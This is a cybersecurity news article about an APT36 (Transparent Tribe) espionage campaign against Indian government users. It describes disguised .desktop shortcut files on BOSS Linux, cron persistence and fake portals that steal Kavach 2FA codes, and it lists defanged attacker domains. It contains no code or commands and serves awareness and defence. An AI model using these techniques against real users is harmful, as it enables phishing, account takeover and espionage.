A major cyberattack has recently been uncovered targeting Indian government agencies. The operation has been linked to Transparent Tribe, also known as APT36, a Pakistan-based hacking group that has repeatedly carried out espionage against India. In this campaign, the hackers are sending phishing emails containing weaponized shortcut files that look like PDF documents but actually install malware.
The attack is dangerous because it focuses on both Windows systems and India’s BOSS Linux platform, which is widely used in government departments. On Linux, the attackers are abusing “.desktop” files, which normally serve as simple application launchers but are now being misused to run harmful scripts. By disguising them as documents, the hackers make it very easy for victims to be tricked.
Once a victim clicks on one of these files, the malicious chain begins. The file downloads a hidden payload from attacker servers or from Google Drive and saves it as an ELF binary on the computer. To avoid suspicion, the victim sees a decoy PDF open, while the malware quietly installs itself in the background.
The payload, written in Go language, is designed to connect to command-and-control servers controlled by the attackers. Through this connection, the hackers can send further instructions, add more tools, and steal sensitive information. To make sure it remains active even after reboot, the malware sets up persistence using cron jobs on Linux systems.
Researchers have identified domains used in this campaign, such as securestore[.]cv for staging and modgovindia[.]space:4000 for communication. In another campaign documented by CloudSEK, malicious archives carried disguised “.desktop” files that downloaded payloads from Google Drive and contacted servers like seemysitelive[.]store over WebSockets on port 8080. These findings show the attackers’ detailed planning.
Along with malware infections, the hackers are also carrying out credential theft operations. They are hosting fake login pages that look exactly like Indian government portals. These sites ask users to enter their email ID, then their password, and finally their Kavach two-factor authentication code. This allows attackers to bypass security even if 2FA is enabled.
Stealing Kavach codes has become a regular tactic for Transparent Tribe. Researchers have observed them using this trick since at least 2022, and the method remains active today. By combining password theft with 2FA code capture, the group can completely compromise sensitive government accounts and gain long-term access to critical systems.
Transparent Tribe is widely believed to be backed by Pakistan and has been active for years. The group mainly focuses on Indian government, defense, and critical infrastructure targets. Its techniques usually involve phishing emails, malware, and fake infrastructure. Recent research has also linked them with the Poseidon backdoor, showing they continue to evolve their tools.
The focus on both Windows and BOSS Linux users highlights the attackers’ awareness of India’s digital environment. By tailoring their operations to the platforms most commonly used by Indian government offices, Transparent Tribe significantly increases the success rate of its campaigns. This shows a dangerous level of preparation and intent behind their operations.
Overall, the latest attacks prove that even files and websites that look completely normal can be dangerous. A shortcut disguised as a PDF or a portal that looks identical to an official site can both be used to trick users. The campaign shows why strong cyber awareness, technical defenses, and careful use of Kavach are crucial to defending Indian government networks against Transparent Tribe’s ongoing espionage.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
